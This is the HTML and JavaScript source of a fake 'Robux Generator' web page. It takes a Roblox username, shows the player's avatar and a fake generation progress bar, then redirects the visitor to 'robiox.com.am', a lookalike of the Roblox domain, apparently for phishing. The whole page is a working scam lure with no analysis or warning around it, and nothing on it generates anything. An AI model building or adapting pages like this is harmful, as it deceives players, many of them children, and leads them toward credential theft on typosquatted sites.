<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Robux Generator</title>
<style>
  body {
    margin: 0;
    background-color: black;
    color: white;
    font-family: Arial, sans-serif;
    overflow: hidden;
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    height: 100vh;
  }

  /* Space dots background */
  #stars {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: -1;
  }

  /* Container for input and avatar */
  #container {
    display: flex;
    flex-direction: column;
    align-items: center;
    margin-bottom: 20px;
  }

  input {
    padding: 10px;
    margin: 10px;
    border-radius: 5px;
    border: none;
    font-size: 16px;
  }

  #avatar {
    width: 100px;
    height: 100px;
    border-radius: 50%;
    border: 2px solid #fff;
    margin-top: 10px;
    object-fit: cover;
  }

  /* Generate button styles */
  #generateBtn {
    padding: 15px 30px;
    font-size: 16px;
    border: none;
    border-radius: 8px;
    background-color: #ff0000;
    color: #fff;
    cursor: pointer;
    display: flex;
    align-items: center;
    transition: background-color 0.3s;
  }

  #generateBtn:hover {
    background-color: #cc0000;
  }

  /* Spinner styles */
  #spinner {
    width: 24px;
    height: 24px;
    margin-right: 10px;
    display: none;
    animation: spin 1s linear infinite;
  }

  @keyframes spin {
    from {transform: rotate(0deg);}
    to {transform: rotate(360deg);}
  }

  /* Status text */
  #status {
    margin-top: 20px;
    font-size: 18px;
    display: none;
  }
</style>
</head>
<body>

<div id="stars"></div>

<div id="container">
  <input type="text" id="username" placeholder="Enter Roblox Username" />
  <img id="avatar" src="" alt="Avatar" />
  <button id="generateBtn">
    <img id="spinner" src="https://upload.wikimedia.org/wikipedia/commons/4/42/Roblox_logo.svg" alt="Loading" />
    <span id="btnText">Generate Robux</span>
  </button>
  <div id="status">Generating Robux, please wait...</div>
</div>

<script>
  // Generate space dots
  const starsContainer = document.getElementById('stars');
  for(let i=0; i<200; i++) {
    const star = document.createElement('div');
    star.style.position='absolute';
    star.style.top=Math.random()*100+'%';
    star.style.left=Math.random()*100+'%';
    star.style.width='2px';
    star.style.height='2px';
    star.style.background='white';
    star.style.borderRadius='50%';
    starsContainer.appendChild(star);
  }

  const usernameInput = document.getElementById('username');
  const avatarImg = document.getElementById('avatar');
  const generateBtn = document.getElementById('generateBtn');
  const spinner = document.getElementById('spinner');
  const btnText = document.getElementById('btnText');
  const statusText = document.getElementById('status');

  // Function to fetch Roblox user ID from username
  function fetchUserId(username) {
    return fetch(`https://api.roblox.com/users/get-by-username?username=${encodeURIComponent(username)}`)
      .then(res => res.json())
      .then(data => {
        if (data && data.Id) {
          return data.Id;
        } else {
          throw new Error('User not found');
        }
      });
  }

  // Function to update avatar based on username
  function updateAvatar() {
    const username = usernameInput.value.trim();
    if (username) {
      fetchUserId(username)
        .then(userId => {
          // Set avatar image URL
          avatarImg.src = `https://www.roblox.com/headshot-thumbnail/image?userId=${userId}&width=100&height=100&cropType=Headshot&format=Png`;
        })
        .catch(() => {
          avatarImg.src = '';
        });
    } else {
      avatarImg.src = '';
    }
  }

  usernameInput.addEventListener('input', updateAvatar);

  generateBtn.addEventListener('click', () => {
    const username = usernameInput.value.trim();
    if (!username) {
      alert('Please enter a Roblox username.');
      return;
    }

    // Show spinner and status
    spinner.style.display='inline-block';
    btnText.style.display='none';
    statusText.style.display='block';

    let progress = 0;
    const progressInterval = setInterval(() => {
      progress += 1;
      statusText.textContent = `Generating Robux, please wait... (${progress}%)`;
      if (progress >= 100) {
        clearInterval(progressInterval);
        // Redirect after delay
        setTimeout(() => {
          window.location.href='https://www.robiox.com.am/communities/4068228252/Vinnys-Garage';
        }, 1000);
      }
    }, 50);
  });
</script>

</body>
</html>